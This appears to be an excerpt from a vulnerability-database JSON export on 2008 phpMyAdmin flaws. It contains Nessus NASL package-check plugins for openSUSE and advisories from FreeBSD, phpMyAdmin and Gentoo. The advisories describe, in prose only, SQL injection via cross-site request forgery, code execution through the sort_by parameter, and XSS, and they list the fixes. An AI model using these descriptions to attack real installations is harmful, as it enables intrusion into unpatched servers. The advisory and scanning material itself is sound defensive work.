(CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 89, 200, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"phpMyAdmin-2.11.9.4-0.1\") ) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:39", "description": "This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (phpMyAdmin-442)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3197", "CVE-2008-1924", "CVE-2008-2960", "CVE-2008-5622", "CVE-2008-4326", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-07-21T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "SUSE_11_0_PHPMYADMIN-090119.NASL", "href": "https://www.tenable.com/plugins/nessus/40107", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-442.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40107);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1149\", \"CVE-2008-1567\", \"CVE-2008-1924\", \"CVE-2008-2960\", \"CVE-2008-3197\", \"CVE-2008-4096\", \"CVE-2008-4326\", \"CVE-2008-5621\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (phpMyAdmin-442)\");\n script_summary(english:\"Check for the phpMyAdmin-442 patch\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=369063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=375320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=383135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=403093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=409459\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=410768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=426517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=450796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=457889\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 89, 200, 352);\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"phpMyAdmin-2.11.9.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5621"], "description": "\nThe phpMyAdmin Team reports:\n\nA logged-in user can be subject of SQL injection through cross\n\t site request forgery. 
Several scripts in phpMyAdmin are\n\t vulnerable and the attack can be made through the table parameter.\n\n", "edition": 4, "modified": "2010-05-02T00:00:00", "published": "2008-12-09T00:00:00", "id": "54F72962-C7BA-11DD-A721-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html", "title": "phpmyadmin -- cross-site request forgery vulnerability", "type": "freebsd", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "phpmyadmin": [{"lastseen": "2019-05-29T17:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2008-5622", "CVE-2008-5621"], "description": "## PMASA-2008-10\n\n**Announcement-ID:** PMASA-2008-10\n\n**Date:** 2008-12-09\n\n### Summary\n\nSQL injection through XSRF on several pages\n\n### Description\n\nA logged-in user can be subjected to SQL injection through cross-site request forgery. Several pages that use the affected library in phpMyAdmin are vulnerable, and the attack can be made through the `table` parameter.\n\n### Severity\n\nWe consider this vulnerability to be serious.\n\n### Affected Versions\n\nFor 2.11.x: versions before 2.11.9.4.<br /> For 3.x: versions before 3.1.1.0.<br />\n\n### Solution\n\nUpgrade to phpMyAdmin 2.11.9.4 or 3.1.1.0 or apply the patch listed below.\n\n### References\n\nAdvisory: <https://www.exploit-db.com/exploits/7382>\n\nAssigned CVE ids: [CVE-2008-5621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5621>) [CVE-2008-5622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5622>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-89](<https://cwe.mitre.org/data/definitions/89.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [01685c90aaba943511de0496e7ecb7fe49fa765b](<https://github.com/phpmyadmin/phpmyadmin/commit/01685c90aaba943511de0496e7ecb7fe49fa765b>)\n\nThe following commits have been made on the 2.11 branch to fix this issue:\n\n * 
[0d4adbfc1996c7d715b0ac9fa39a2ac14d8b28ad](<https://github.com/phpmyadmin/phpmyadmin/commit/0d4adbfc1996c7d715b0ac9fa39a2ac14d8b28ad>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "edition": 2, "modified": "2008-12-09T00:00:00", "published": "2008-12-09T00:00:00", "id": "PHPMYADMIN:PMASA-2008-10", "href": "https://www.phpmyadmin.net/security/PMASA-2008-10/", "title": "SQL injection through XSRF on several pages", "type": "phpmyadmin", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5977", "CVE-2008-5622", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "edition": 1, "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been reported in phpMyAdmin: \n\n * libraries/database_interface.lib.php in phpMyAdmin allows remote authenticated users to execute arbitrary code via a request to server_databases.php with a sort_by parameter containing PHP sequences, which are processed by create_function (CVE-2008-4096). \n * Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977 (CVE-2008-4775). \n * Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows remote authenticated attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: this can be leveraged to conduct SQL injection attacks and execute arbitrary code (CVE-2008-5621). 
\n * Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyAdmin allow remote attackers to conduct SQL injection attacks via unknown vectors related to the table parameter, a different vector than CVE-2008-5621 (CVE-2008-5622). \n\n### Impact\n\nA remote attacker may execute arbitrary code with the rights of the webserver, inject and execute SQL with the rights of phpMyAdmin or conduct XSS attacks against other users. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-2.11.9.4\"", "modified": "2009-03-18T00:00:00", "published": "2009-03-18T00:00:00", "id": "GLSA-200903-32", "href": "https://security.gentoo.org/glsa/200903-32", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}